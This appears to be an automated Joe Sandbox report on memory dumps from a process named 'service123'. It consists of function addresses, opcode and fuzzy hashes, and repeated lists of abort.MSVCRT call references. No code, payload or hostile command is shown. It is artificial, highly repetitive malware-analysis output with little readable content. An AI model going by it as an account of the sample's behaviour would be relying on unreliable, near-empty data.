Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6446f6b3ff3dfa52744bb4993cc0802ff9ccbc8fd6bf1aca3ecce96d2e4ab9c7
Instruction ID: f0a0b36e2ffd81a2e200f912d42bff19ede41afc4f634333b68283f96724ffd4
Opcode Fuzzy Hash: 6446f6b3ff3dfa52744bb4993cc0802ff9ccbc8fd6bf1aca3ecce96d2e4ab9c7
Instruction Fuzzy Hash: DF11D6B2E002008FD300EF29C545746BBF5AB9A318F69C59DD8488B755E77AD4068FA6

Function 6C30BDF0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7dd9062b330cc6983a1f7126467d4c911d06656e34d15a52614d4761a2eca70
Instruction ID: 390bf5a21b6d9417301f513d65522a9c2b74dc04f7e3593106006bfce89cfc0a
Opcode Fuzzy Hash: c7dd9062b330cc6983a1f7126467d4c911d06656e34d15a52614d4761a2eca70
Instruction Fuzzy Hash: 2C01DB72F481448F8700EE7DC88445AB7F8AB5A21CF45DA5AE84897745E631D4048FBA

Function 6C338250 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873e21e49b0a2da72f2d9ae9220203a179f57bb6994c838dadcf5b451917e9f4
Instruction ID: 3f691e1a77262694919f668c644efccb8b628543e3f1e715972ee11ef2bd0250
Opcode Fuzzy Hash: 873e21e49b0a2da72f2d9ae9220203a179f57bb6994c838dadcf5b451917e9f4
Instruction Fuzzy Hash: F0012C71A082908FC701DF3AC48156BBBF4AB6B204F45D95AE888C7356E236C405CB6B

Function 6C2BD2B4 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ee32aa5ad927b1dc4a83478f86cfe336878b9b3e5cb2284810fcf843c81a86
Instruction ID: 06c85d8a6714e42de4520cc6b6e75c16e2d54e00f1c382d059c3639ad1ee8948
Opcode Fuzzy Hash: 95ee32aa5ad927b1dc4a83478f86cfe336878b9b3e5cb2284810fcf843c81a86
Instruction Fuzzy Hash: 26019EB1A013059BDB04DF29C4807AAFBE4EF85248F10C46DE888DB705D335D846CB92

Function 6C364110 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3708503bd3b74ed2f3cf59dc9cef3c76c00ab40afc72ae98edd9df2ccf47da8f
Instruction ID: f0780e4d28f8375bfad85ea087e729a354b4a04875d24b5ee071b6d0041d95df
Opcode Fuzzy Hash: 3708503bd3b74ed2f3cf59dc9cef3c76c00ab40afc72ae98edd9df2ccf47da8f
Instruction Fuzzy Hash: 2FF01D36E041409F8700FF3EC9519A677F8A75B218F889959D848C3B09F235D0145F7B

Function 6C2E9F90 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eab8b8c8550fb6de22d323cf2eb956044c08ee88d48352b91cc5382e130c8af9
Instruction ID: 76e86b5ed4bd05f089112093736729360e22ac9038494498916322caec2b0f07
Opcode Fuzzy Hash: eab8b8c8550fb6de22d323cf2eb956044c08ee88d48352b91cc5382e130c8af9
Instruction Fuzzy Hash: 45D01231E000049FCB00EE29C540456B7B4EB56208B94D945D80897605E632D4058B69

Function 6C2BD424 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47961f71c532a5ba7c31f82db50096166d24a052be1b17e5d052e010392cb2e
Instruction ID: 7b8b5fa210728dc271f882a6e79d669e50dba883f65dd41c58f8f3264dd08247
Opcode Fuzzy Hash: f47961f71c532a5ba7c31f82db50096166d24a052be1b17e5d052e010392cb2e
Instruction Fuzzy Hash: 03C012718011054BCF40EF3480C00BCF7F06F42298F525C68C484E7704DB70D846DB46

Function 6C2BD5A4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0d6367cb766bfedf8e938575c0c5d72422501bc95d77e19ba91109e056c638
Instruction ID: 4ce8a83a6a84e1bb15b6155def5a5ad90e2c00baca445f32481c27a240202652
Opcode Fuzzy Hash: 5a0d6367cb766bfedf8e938575c0c5d72422501bc95d77e19ba91109e056c638
Instruction Fuzzy Hash: F4C0C9718001054A8F40AF3481805B8B6F06B42288F121858C484E7604DB30D845DB46

Function 6C2BD724 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction ID: a66077f2eeb984efdf8c7a32ce8b50bb13584d314ba417f75cdcb8b524074153
Opcode Fuzzy Hash: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction Fuzzy Hash: 2AC012719011054BCF40EF3581C00BCF6F06B42288F625858C484E7604DB70C846DB46

Function 6C2AAF80 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 1529158737441cf7dea7d9888319185ad633b0f03f87f6d9fc0fcf301405cd4f
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: EFC08CB0C083808BC200BF38D10A62CFAB06F42208FC42CACD4C013705EB35C12C8A9F

Function 6C2928FA Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C366CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Strings

L:7l, xrefs: 6C292929

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID: L:7l
API String ID: 4206212132-1426535818
Opcode ID: 7658e229d0ebf45d0d9efeb2da23dc93d61a26bb57fa9435dffe2175eac9c262
Instruction ID: dbb071581318aa880258c3c9a4f6ee33281345a1f2f1e064e88f264a08d72ccd
Opcode Fuzzy Hash: 7658e229d0ebf45d0d9efeb2da23dc93d61a26bb57fa9435dffe2175eac9c262
Instruction Fuzzy Hash: DE11C2B2642205CBE708FF19E891F5577B0FB11309F009B48D584C7A15D739E828CFA5

Function 6C292A2F Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C366CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Strings

V:7l, xrefs: 6C292A5E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID: V:7l
API String ID: 4206212132-2136455849
Opcode ID: da89fe7f44a5a4b73fd1a03a16f9ceede26b8492f6f09944f2f90ae9a82d39f2
Instruction ID: 56150a59cfa13a06ebc343c0172912b0faba4f7febf6c1bb8085fc1d5b602617
Opcode Fuzzy Hash: da89fe7f44a5a4b73fd1a03a16f9ceede26b8492f6f09944f2f90ae9a82d39f2
Instruction Fuzzy Hash: 6C11E2B2642205CBE308FF2AE891F55B7B0FB11309F009B48D584CBA15D739E828CFA5

Function 6C2929B1 Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C366CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Strings

`:7l, xrefs: 6C2929E0

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: abort
String ID: `:7l
API String ID: 4206212132-3359614517
Opcode ID: 3d02c0ed9bbb955286717c897a1f88c38afdcabf1e79f139b24fab4ac90d7560
Instruction ID: c3c15244503e5da0135c89e551769a77c24a4206de202750bb33a3db5e093e10
Opcode Fuzzy Hash: 3d02c0ed9bbb955286717c897a1f88c38afdcabf1e79f139b24fab4ac90d7560
Instruction Fuzzy Hash: DAF017B1645606CBD704EF5AD094B6AB7B0FF0234CF119A48C8849BB06D735E429CF95

Function 6C29BAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D03
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D08
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D12
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D17
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D21
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D26
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D30
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D35
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C29C5DB), ref: 6C366D44
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D4C
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D51
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D56
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D5B
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D60
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D65
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6A
abort.MSVCRT(?,?,?,?,?,?,6C29E2F4,?,?,?,?,?,?,00000000,00000001,6C2A008D), ref: 6C366D6F
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D74
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D79
abort.MSVCRT(?,?,00000000,00000000,?,756EE010,6C2A038F), ref: 6C366D7E

Strings

@, xrefs: 6C29BAB1

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
